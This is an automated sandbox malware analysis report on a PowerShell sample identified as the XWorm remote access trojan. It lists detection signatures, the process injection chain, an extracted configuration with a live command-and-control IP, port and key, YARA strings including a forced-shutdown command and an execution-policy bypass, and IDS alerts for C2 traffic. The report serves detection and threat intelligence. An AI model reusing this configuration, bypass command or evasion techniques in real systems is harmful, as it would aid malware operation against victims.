Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
92.255.57_1.112.ps1

Overview

General Information

Sample name:92.255.57_1.112.ps1
Analysis ID:1590525
MD5:d2334ba5738e776d924f60934e24874f
SHA1:bb8dfe86ea75e9926de42a8acdfa4f9579681cbb
SHA256:2a8290c18d10fa8a7e99575855b9fb8e734ea92b1aa7dce9840282c2657ba08c
Tags:bookingps1SPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 3728 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 4364 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • wermgr.exe (PID: 7124 cmdline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3728" "2668" "2508" "2672" "0" "0" "2676" "0" "0" "0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["92.255.57.112"], "Port": 4418, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.4565884702.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000003.00000002.4565884702.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0xcd41:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xcdde:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0xcef3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xc99c:$cnc4: POST / HTTP/1.1
    00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x1e5379:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x1e5416:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x1e552b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x1e4fd4:$cnc4: POST / HTTP/1.1
        Click to see the 6 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.powershell.exe.21c4a460438.2.unpackJoeSecurity_XWormYara detected XWormJoe Security
          0.2.powershell.exe.21c4a460438.2.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
          • 0x7f2f:$str01: $VB$Local_Port
          • 0x7f53:$str02: $VB$Local_Host
          • 0x6715:$str03: get_Jpeg
          • 0x6d3b:$str04: get_ServicePack
          • 0x906c:$str05: Select * from AntivirusProduct
          • 0xa00d:$str06: PCRestart
          • 0xa021:$str07: shutdown.exe /f /r /t 0
          • 0xa0d3:$str08: StopReport
          • 0xa0a9:$str09: StopDDos
          • 0xa19f:$str10: sendPlugin
          • 0xa21f:$str11: OfflineKeylogger Not Enabled
          • 0xa377:$str12: -ExecutionPolicy Bypass -File "
          • 0xae81:$str13: Content-length: 5235
          0.2.powershell.exe.21c4a460438.2.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0xb141:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0xb1de:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0xb2f3:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0xad9c:$cnc4: POST / HTTP/1.1
          0.2.powershell.exe.21c4b279478.3.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.2.powershell.exe.21c4b279478.3.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
            • 0x7f2f:$str01: $VB$Local_Port
            • 0x7f53:$str02: $VB$Local_Host
            • 0x6715:$str03: get_Jpeg
            • 0x6d3b:$str04: get_ServicePack
            • 0x906c:$str05: Select * from AntivirusProduct
            • 0xa00d:$str06: PCRestart
            • 0xa021:$str07: shutdown.exe /f /r /t 0
            • 0xa0d3:$str08: StopReport
            • 0xa0a9:$str09: StopDDos
            • 0xa19f:$str10: sendPlugin
            • 0xa21f:$str11: OfflineKeylogger Not Enabled
            • 0xa377:$str12: -ExecutionPolicy Bypass -File "
            • 0xae81:$str13: Content-length: 5235
            Click to see the 10 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1", ProcessId: 3728, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1", ProcessId: 3728, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-14T08:27:40.073058+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:27:44.937260+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:27:51.255164+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:28:02.442476+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:28:13.635190+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:28:14.956835+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:28:24.817914+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:28:36.005064+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:28:36.489510+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:28:37.296156+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:28:38.348994+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:28:42.036211+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:28:42.973564+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:28:43.095818+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:28:44.925973+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:28:48.630200+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:28:54.584189+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:28:56.224582+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:28:59.397393+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:29:10.286476+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:29:10.408688+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:29:10.534909+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:29:14.930046+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:29:21.005626+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:29:21.127308+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:29:26.505737+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:29:34.036600+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:29:37.114630+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:29:37.722426+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:29:39.411657+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:29:44.932971+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:29:51.180581+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:29:53.588912+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:30:00.926930+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:30:02.051886+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:30:02.201358+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:30:13.305969+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:30:15.214395+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:30:21.148508+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:30:22.589673+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:30:22.980738+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:30:28.505065+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:30:28.628001+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:30:28.749463+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:30:28.871836+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:30:33.927249+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:30:44.927199+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:30:45.048649+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:30:56.914325+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:31:00.770510+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:31:06.161472+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:31:07.568542+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:31:09.051997+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:31:14.979305+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:31:16.724496+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:31:16.846847+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:31:22.178348+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:31:27.083048+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            2025-01-14T08:31:29.286494+010028528701Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-14T08:27:40.116270+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:27:51.257204+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:28:02.445368+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:28:13.637235+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:28:24.820770+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:28:36.007395+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:28:36.491595+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:28:37.308760+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:28:38.351281+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:28:42.039660+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:28:42.984115+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:28:43.098048+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:28:48.632500+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:28:54.586259+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:28:56.481043+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:28:59.411702+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:29:10.288599+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:29:10.410806+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:29:10.536690+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:29:10.654485+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:29:10.659497+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:29:10.775817+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:29:10.785619+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:29:21.007583+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:29:21.131335+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:29:26.510277+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:29:34.040662+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:29:37.116024+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:29:37.739551+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:29:39.415353+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:29:51.250458+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:29:53.591335+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:30:00.932702+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:30:02.053255+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:30:02.202639+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:30:13.307925+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:30:21.244123+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:30:22.591934+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:30:22.984877+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:30:28.506877+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:30:28.629443+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:30:28.750818+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:30:28.873138+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:30:33.929262+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:30:44.929510+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:30:45.180503+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:30:45.185470+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:30:56.916244+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:31:00.774964+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:31:06.163091+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:31:07.570003+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:31:09.053540+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:31:16.726844+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:31:16.848458+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:31:22.187059+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:31:27.084367+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            2025-01-14T08:31:29.287318+010028529231Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-14T08:27:44.937260+010028588011Malware Command and Control Activity Detected92.255.57.1124418192.168.2.649714TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-14T08:29:20.787767+010028587991Malware Command and Control Activity Detected192.168.2.64971492.255.57.1124418TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["92.255.57.112"], "Port": 4418, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
            Multi AV Scanner detection for submitted file
            Source: 92.255.57_1.112.ps1Virustotal: Detection: 18%Perma Link
            Source: 92.255.57_1.112.ps1ReversingLabs: Detection: 13%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Sample uses string decryption to hide its real strings
            Source: 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpString decryptor: 92.255.57.112
            Source: 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpString decryptor: 4418
            Source: 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpString decryptor: P0WER
            Source: 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpString decryptor: <Xwormmm>
            Source: 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpString decryptor: XWorm
            Source: 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmpString decryptor: USB.exe
            Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2168693034.0000021C49C80000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2168812433.0000021C4AEDB000.00000004.00000800.00020000.00000000.sdmp

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49714 -> 92.255.57.112:4418
            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 92.255.57.112:4418 -> 192.168.2.6:49714
            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49714 -> 92.255.57.112:4418
            Source: Network trafficSuricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 92.255.57.112:4418 -> 192.168.2.6:49714
            Source: Network trafficSuricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49714 -> 92.255.57.112:4418
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: 92.255.57.112
            Source: global trafficTCP traffic: 192.168.2.6:49714 -> 92.255.57.112:4418
            Source: global trafficTCP traffic: 192.168.2.6:64168 -> 162.159.36.2:53
            Source: Joe Sandbox ViewASN Name: TELSPRU TELSPRU
            Source: unknownDNS traffic detected: query: 15.164.165.52.in-addr.arpa replaycode: Name error (3)
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: unknownTCP traffic detected without corresponding DNS query: 92.255.57.112
            Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
            Source: powershell.exe, 00000000.00000002.2168812433.0000021C4B438000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2187842914.0000021C5A2FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
